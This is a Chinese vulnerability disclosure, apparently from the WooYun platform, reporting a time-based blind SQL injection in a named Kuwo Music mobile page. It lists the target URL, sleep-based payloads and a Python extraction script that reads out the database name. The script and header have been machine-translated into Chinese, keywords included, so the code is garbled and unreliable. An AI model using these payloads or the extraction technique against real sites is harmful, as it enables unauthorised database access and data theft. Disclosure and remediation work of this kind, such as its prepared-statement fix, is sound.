酷我音乐某站存在SQL注入(附验证脚本)

漏洞标题 酷我音乐某站存在SQL注入(附验证脚本) 相关厂商 酷我音乐 漏洞作者 Vinc 提交时间 2016-04-29 12:12 公开时间 2016-06-16 19:30 漏洞类型 SQL注射…

漏洞标题 酷我的音乐台有SQL注入(带验证脚本) 相关制造商 kuwo音乐 漏洞作者 时Vinc 提交时间 2016-04-29 12: 12 公共时间 2016-06-16 19: 30 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 Sql注入 漏洞详细信息 http://mobile.kuwo.cn/mpage/special/oldSpecail.jsp?specialType=(if(1=2,sleep(5),2))&nowId=1033 (if(1=1,sleep(5),2)): 错误503服务不可用 (如果(1=2,睡眠(5),2)): 返回200 Database()是EDITOR 漏洞证明:

# - * - 编码: utf8 - * - #编码=UTF-8 导入httplib 进口时间 导入字符串 导入系统 headers={ 'User-Agent':'Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/28.0.1500.63 Safari/537.36', 'Referer':'http://ldj.db.17173.com', } Payloads=list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 @ _。') 打印'[%s]开始重试MySQL数据库()'%time.strftime('%H:%M:%S',time.localtime()) 数据库='' 对于范围(1,7,1):中的i 对于有效负载:中的有效负载 试试: Conn=httplib.HTTPConnection('mobile.kuwo.cn',超时=20) Conn.request(method='GET',url='/mpage/special/oldSpecail.jsp?specialType=(if(ascii(substr(database(),'+ str(i)+',1))='+ STR(ORD(有效载荷))+ '睡眠(10),1))') Status=conn.getresponse()。status Conn.close() 除了例外,e: 打印e 数据库+=有效负载 打印'\ r [+]运行:',数据库 Time.sleep(0.01) 打破 打印'' 打印'database()is',数据库 修理计划: 预编译处理 版权声明:请注明出处Vinc @乌云